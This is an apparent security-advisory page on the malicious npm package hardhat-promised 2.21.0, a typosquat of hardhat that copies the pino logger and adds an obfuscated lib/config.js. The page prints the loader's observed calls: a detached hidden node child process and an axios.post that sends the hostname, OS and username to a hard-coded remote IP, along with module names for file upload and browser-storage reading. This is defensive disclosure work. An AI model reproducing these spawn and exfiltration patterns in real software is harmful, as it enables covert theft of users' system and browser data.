VDB

GCVE-110-OSM-2026-13372

GCVE-110-OSM-2026-13372
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published October 7, 2026
Package hardhat-promised, version 2.21.0, published 2026-10-06 13:59 UTC by user ryan.danial915 (the account's only package, created the same day). The name targets the Ethereum tool hardhat. The package is a verbatim copy of the pino logger (README, docs, lib files, SECURITY.md; the README badges still point to pino) with one file added that pino does not contain: lib/config.js, a single-line 4.4 MB obfuscated script. index.js loads it on line 6, so it runs as soon as the package is required; the exported "middleware" is a no-op. The dependency axios, which pino does not use, was added for it. When lib/config.js is loaded in an instrumented sandbox it: 1. spawns a detached node child process with the script fed over stdin and stdout/stderr ignored, i.e. a hidden background process that outlives the parent; 2. builds code with the Function constructor; 3. posts JSON to a hard-coded remote server (http://167.88.172.33:8087/api/log) containing the hostname, OS platform/release/type and the current username, with a fixed key ukey 301 and a hash validation header. The messages it sends name three modules, autoUploadScript, ldbScript and socketScript (file upload, LevelDB/browser-storage reading, persistent socket). Tarball sha1 0c83fd872e723e8c68c7b6c893637859fb1a7907. Not listed in OSV or the GitHub Advisory Database. Socket.dev independently flags this version as known malware. Please remove version 2.21.0 and replace the package with a security holding package. lib/config.js (4,373,384 bytes, one line, javascript-obfuscator style with hex-escaped string table), required by index.js line 6. Observed on load: - child_process.spawn(node, ["--max-old-space-size=4096","--no-warnings","-"], {detached:true, windowsHide:true, stdio:["pipe","ignore","ignore"]}) - Function("return (function(){}.constructor('return this')())") - axios.post("http://167.88.172.33:8087/api/log", {ukey:"301", t:"3", host:<os.hostname()>, os:<platform release type>, username:<os.userInfo().username>, message, level:"info", timestamp}, {headers:{"Content-Type":"application/json", validation:<sha256>}, timeout:10000}) - messages: "Starting client", "Spawning autoUploadScript", "Spawning ldbScript", "Spawning socketScript", "Failed to spawn <name>: ..." Tarball sha256 9a2f53a1a9360f638029da2687e84184f33d1c4fa5b9f0bbf6b92de7fb8fa824, sha1 0c83fd872e723e8c68c7b6c893637859fb1a7907.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownhardhat-promisedall (affected)—

References

vendor

Browse GCVE Records

3,310 records in the GCVE database · Updated October 7, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›